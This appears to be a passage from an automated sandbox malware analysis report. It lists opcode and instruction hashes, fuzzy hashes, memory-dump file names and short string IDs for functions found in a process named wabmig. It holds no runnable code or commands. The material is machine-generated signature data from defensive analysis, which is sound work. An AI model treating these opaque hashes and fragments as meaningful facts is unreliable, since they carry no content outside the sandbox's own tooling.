                                        • Opcode ID: c1eb5d07d60c380828bd6585a5c82d9a76c455868ab89abe084d8a3d6d72dad2
                                        • Instruction ID: 150ce19e6d515cf43e8bc5b4e005553117519cb0f292f1334038db57df7a678f
                                        • Opcode Fuzzy Hash: c1eb5d07d60c380828bd6585a5c82d9a76c455868ab89abe084d8a3d6d72dad2
                                        • Instruction Fuzzy Hash: 01F0A036E20228D7DB19EA75DC00ADAB77AFB85360F11446AFE01E7340DA31AD00CBD0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1f063e656d75882f871b7b03bc79539e5ca56bdc42f7d49472cda7cf9717f0f
                                        • Instruction ID: bbdd8d78969e3c629d76f33657e8d11245952076991129ac91c80bb82ec66174
                                        • Opcode Fuzzy Hash: b1f063e656d75882f871b7b03bc79539e5ca56bdc42f7d49472cda7cf9717f0f
                                        • Instruction Fuzzy Hash: 98E09231D052449FDB11CF708A442497BB89B02204F3244DAE449D7153E936CB16D741
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 105533289c672c70b77a2127566478a11c6e4a8ee0802eacdb3449de9dbea2de
                                        • Instruction ID: 50034fd1fe1c66c0ca053529970a87d120fd86ae25fccca69d53eedeb6c3963b
                                        • Opcode Fuzzy Hash: 105533289c672c70b77a2127566478a11c6e4a8ee0802eacdb3449de9dbea2de
                                        • Instruction Fuzzy Hash: 72E01271E50108ABDB00CEB4C94974E77ADD706254F3184E5E40AD7217E977DF02D780
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                        • API String ID: 0-1462074617
                                        • Opcode ID: 72b7d362401348eae5dc2bc26a48df3f20e20a861b27cc03b478ecdcdac27e8c
                                        • Instruction ID: fb1a0b1f69df51586f17e5523c8722259700928e447e6f72b5380da25efdff47
                                        • Opcode Fuzzy Hash: 72b7d362401348eae5dc2bc26a48df3f20e20a861b27cc03b478ecdcdac27e8c
                                        • Instruction Fuzzy Hash: 30123D70E00219CFDB24DFA5C994A9EB7B6BF88300F2185A9E509AB355DF319E41CF91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                        • API String ID: 0-3929485403
                                        • Opcode ID: 5921851ec05b57d2c68ccf4c824731d439f6c099d02797ebcc715146d457af1b
                                        • Instruction ID: 59f51a265c16559f8e15dd0dcf3714875d312f8539612c718c347b2d7beb1b54
                                        • Opcode Fuzzy Hash: 5921851ec05b57d2c68ccf4c824731d439f6c099d02797ebcc715146d457af1b
                                        • Instruction Fuzzy Hash: 1F916C30E012099FDB18EB65D994BAE7BB7FF84300F218569F405AB294DF349D49CB98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .5~q$$fq$$fq$$fq$$fq$$fq$$fq
                                        • API String ID: 0-1301248726
                                        • Opcode ID: c5fcbc3415b5a620035d79ef4d34d5756ad6b419a1baf4d925bcd72bd803f174
                                        • Instruction ID: 8cf296e7bd8763236f925e3d3c2101b154b8865ea3ca14c7b311b868e70930af
                                        • Opcode Fuzzy Hash: c5fcbc3415b5a620035d79ef4d34d5756ad6b419a1baf4d925bcd72bd803f174
                                        • Instruction Fuzzy Hash: DFF15C34A11208CFDB19DFA8C494A5EB7B7FF88340F258569E405AB3A5CF35AD42CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $fq$$fq$$fq$$fq
                                        • API String ID: 0-2113499236
                                        • Opcode ID: 6e8ca969848fb4a984d96943ab38e468c63c3fddd3315f90980a8bffb7061d0e
                                        • Instruction ID: b994c2bb022f2b3ba0dcc228d2f1a76bfbb014a614bff1aef75dec89403156fb
                                        • Opcode Fuzzy Hash: 6e8ca969848fb4a984d96943ab38e468c63c3fddd3315f90980a8bffb7061d0e
                                        • Instruction Fuzzy Hash: 07B13B30E112188BDB14DBA9C69469EB7B7FF84300F258469E406AB395DF35DD82CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LRfq$LRfq$$fq$$fq
                                        • API String ID: 0-1810675050
                                        • Opcode ID: c02f442258257fe5c365ff753672bf94505f5bdd26819a77986a7bad432e7c06
                                        • Instruction ID: cf9161d0ee3accf7ec3a61f557fb9a733a23f20dc7627c47c08f57539a5be209
                                        • Opcode Fuzzy Hash: c02f442258257fe5c365ff753672bf94505f5bdd26819a77986a7bad432e7c06
                                        • Instruction Fuzzy Hash: 67518130B002159FDB08DB68CA94A6A77EAFF88310F1585ADF415AB3A5DF34EC41CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $fq$$fq$$fq$$fq
                                        • API String ID: 0-2113499236
                                        • Opcode ID: dcd13f990f0b0a1b5bb824789c7583daecc03a2ba58d5c1f2130738c50aa03db
                                        • Instruction ID: f4151bf984a6cfe681d23fb122cd492710059da5aaa8f0c8ca7c7fc016342912
                                        • Opcode Fuzzy Hash: dcd13f990f0b0a1b5bb824789c7583daecc03a2ba58d5c1f2130738c50aa03db
                                        • Instruction Fuzzy Hash: 44519E34E102058BCB15DB68D490AADB7B7EB88300F21856AE806A7355DF34DD49CB99